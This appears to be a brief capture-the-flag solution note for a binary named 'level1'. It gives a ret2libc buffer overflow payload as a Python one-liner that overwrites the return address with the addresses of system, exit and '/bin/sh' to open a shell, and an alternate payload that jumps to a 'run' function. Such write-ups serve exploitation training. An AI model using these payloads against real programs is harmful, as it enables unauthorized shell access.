Buffer Overflow - ret2libc

(python -c "print('A' * 76 + '\x60\xb0\xe6\xb7' + '\xe0\xeb\xe5\xb7' + '\x58\xcc\xf8\xb7')"; cat) | ./level1

'A' * 76 -> Size of the buffer
'\x60\xb0\xe6\xb7' -> Address of system
'\xe0\xeb\xe5\xb7' -> Address of exit to avoid segv
'\x58\xcc\xf8\xb7' -> Address of "/bin/sh" given to system

Then cat to avoid the shell to close

Alternate Solution:

sub esp, 0x50

0x50 ou 80 buffer's length
0x8048444 <= run function's address

(python -c 'print("A"*76+"\x44\x84\x04\x08")';cat) | ./level1
